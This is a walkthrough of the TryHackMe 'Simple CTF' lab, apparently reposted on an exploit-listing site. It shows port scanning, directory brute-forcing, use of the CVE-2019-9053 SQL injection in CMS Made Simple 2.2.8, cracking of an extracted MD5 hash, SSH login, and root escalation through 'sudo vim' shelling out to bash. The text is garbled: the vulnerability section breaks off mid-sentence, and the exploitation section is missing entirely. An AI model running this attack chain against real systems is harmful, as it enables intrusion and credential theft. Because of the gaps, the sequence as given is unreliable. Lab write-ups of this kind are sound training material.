Exploit for simplectf CVE-2019-9053

Name: Exploit for simplectf CVE-2019-9053
Rating: 5 (2 reviews)
2026-06-04 | CVSS 8.1
## https://sploitus.com/exploit?id=82BACCCF-4973-500F-8B25-5714A0310B69
# Simple CTF — TryHackMe Walkthrough
> **Platform:** TryHackMe | **Difficulty:** Easy | **CVE:** CVE-2019-9053

---

## 1. Reconnaissance

### Port Scan
```bash
nmap -p- --open 
```

**Results:**
| Port | Service |
|------|---------|
| 21 | FTP |
| 80 | HTTP |
| 2222 | SSH (non-default port) |

Confirm port 2222:
```bash
nmap -p 2222 -sS -sV -A 
```
Output confirmed OpenSSH 7.2p2 on port 2222.

---

## 2. Web Enumeration

Visiting port 80 gave a default Apache page with nothing useful in the source.

Ran Gobuster to find hidden directories:
```bash
gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
```

**Found:** `/simple` — a CMS Made Simple installation running version **2.2.8**.

---

## 3. Vulnerability Research

Searched for known exploits:
```bash
searchsploit CMS Made Simple 2.2.8
```

Found **CVE-2019-9053** — an unauthenticated time-based SQL injection affecting CMS Made Simple /simple
```

**Extracted:**
| Field | Value |
|-------|-------|
| Salt | `1dac0d92e9fa6bb2` |
| Username | `mitch` |
| Email | *(found)* |
| Password hash | `0c01f4468bd75d7a84c7eb73846e8d96` |

Cracked the MD5 hash using CrackStation:
```
0c01f4468bd75d7a84c7eb73846e8d96 → secret
```

---

## 5. Initial Access

SSH is running on port 2222. Connected with the cracked credentials:
```bash
ssh mitch@ -p 2222
```

**User flag:**
```bash
ls
cat user.txt
```

---

## 6. Privilege Escalation

Checked sudo permissions:
```bash
sudo -l
```

Output showed `mitch` can run `vim` as root with no password.

Used GTFOBins vim privesc to read the root flag directly:
```bash
sudo vim /root/root.txt
```

Or to get a root shell:
```bash
sudo vim -c ':!/bin/bash'
```

**Root flag captured.**

---

## Summary

| Step | Detail |
|------|--------|
| Open ports | 21 (FTP), 80 (HTTP), 2222 (SSH) |
| Web discovery | `/simple` → CMS Made Simple 2.2.8 |
| CVE | CVE-2019-9053 (SQLi) |
| Credentials | `mitch` : `secret` |
| Privesc vector | `sudo vim` → GTFOBins |

---

## Tools Used
- `nmap`
- `gobuster`
- `searchsploit`
- Custom Python 3 exploit (CVE-2019-9053)
- CrackStation (MD5 lookup)
- `ssh`
- GTFOBins